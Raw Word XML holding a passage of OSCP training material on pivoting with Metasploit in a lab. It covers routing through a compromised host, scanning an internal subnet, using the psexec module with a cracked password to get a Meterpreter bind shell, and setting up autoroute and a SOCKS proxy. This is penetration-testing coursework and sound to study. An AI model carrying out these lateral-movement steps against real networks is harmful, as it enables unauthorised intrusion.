        <w:t xml:space="preserve">From OSCP (21.3.3. Pivoting with Metasploit)</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The ability to pivot to another target or network is a vital skill for every penetration tester. In Port Redirection and Pivoting, we learned various techniques to perform pivoting. Instead of using these techniques manually, we can also use Metasploit to perform them.</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As in the previous sections, we'll connect to the bind shell on port 4444 on the machine ITWK01. Let's assume we are currently gathering information on the target. In this step, we'll identify a second network interface.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3900488" cy="3540443"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77" name="image71.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image71.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3900488" cy="3540443"/>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Listing 74 shows that the second interface has the assigned IP 172.16.5.199. We can try to identify other live hosts on this second network by leveraging methods from active information gathering. </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Now that we have a working session on the compromised system, we can background it. To add a route to a network reachable through a compromised host, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route add</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the network information and session ID that the route applies to. After adding the route, we can display the current routes with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route print</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3814437" cy="2414588"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="410" name="image391.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image391.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3814437"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With a path created to the internal network, we can enumerate this subnet. Now we could scan the whole network for live hosts with a port scan auxiliary module. Since this scan would take quite some time to complete, let's shorten this step by only scanning the other live host in the second network. Therefore, instead of setting the value of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as we would do if we wanted to scan the whole network, we set it to 172.16.5.200. For now, we only want to scan ports 445 and 3389.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000591">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4633578" cy="2710346"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="234" name="image226.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image226.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4633578" cy="2710346"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="830"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use auxiliary/scanner/portscan/tcp</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 77 shows that 172.161.5.200 has ports 445 and 3389 open. Let's use two modules for SMB and RDP using our pivot host ITWK01 to perform operations on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000596">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, we'll attempt to use the</w:t>
      </w:r>
      <w:hyperlink r:id="rId139">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId140">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">psexec</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module to get access on the second target as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In the previous section, we retrieved the NTLM hash via Kiwi. Let's assume we could successfully crack the NTLM hash and the clear-text password is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BoccieDearAeroMeow1!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psexec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to succeed, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has to be a local administrator on the second machine. For this example, let's also assume that we confirmed this through information gathering techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000597">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/windows/smb/psexec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and set </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMBUser</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMBPass</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BoccieDearAeroMeow1!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.200</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000598">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's important to note that the added route will only work with established connections. Because of this, the new shell on the target must be a bind shell such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/x64/meterpreter/bind_tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, thus allowing us to use the set route to connect to it. A reverse shell payload would not be able to find its way back to our attacking system in most situations because the target does not have a route defined for our network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000599">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5235253" cy="3062288"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="357" name="image357.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image357.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId141"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5235253"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="708"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use exploit/windows/smb/psexec</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Now that all options are set, we can launch the module.</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 79 shows that we successfully used the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psexec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit module to obtain a Meterpreter shell on the second target via the compromised machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000059F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As an alternative to adding routes manually, we can use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">autoroute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> post-exploitation module to set up pivot routes through an existing Meterpreter session automatically. To demonstrate the usage of this module, we first need to remove the route we set manually. Let's terminate the Meterpreter session created through the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">psexec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> module and remove all routes with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route flush</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now the only session left is the Meterpreter session created by executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">met.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">luiza</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In addition, the result of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route print</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> states that there are no routes defined. Next, let's activate the module </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/manage/autoroute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which we must set the session ID as value for the option </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SESSION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Then, let's enter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to launch the module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5191752" cy="5557838"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60" name="image66.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image66.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId142"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5191752"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="537"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use multi/manage/autoroute</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 80 shows that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">autoroute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> added 172.16.5.0/24 to the routing table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A5">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We could now use the psexec module as we did before, but we can also combine routes with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server/socks_proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary module to configure a</w:t>
      </w:r>
      <w:hyperlink r:id="rId143">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId144">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SOCKS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxy. This allows applications outside of the Metasploit Framework to tunnel through the pivot on port 1080 by default. We set the option </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SRVHOST</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to use SOCKS version 5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000005A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5004864" cy="4595813"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="542" name="image524.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image524.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId145"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5004864"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1296"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
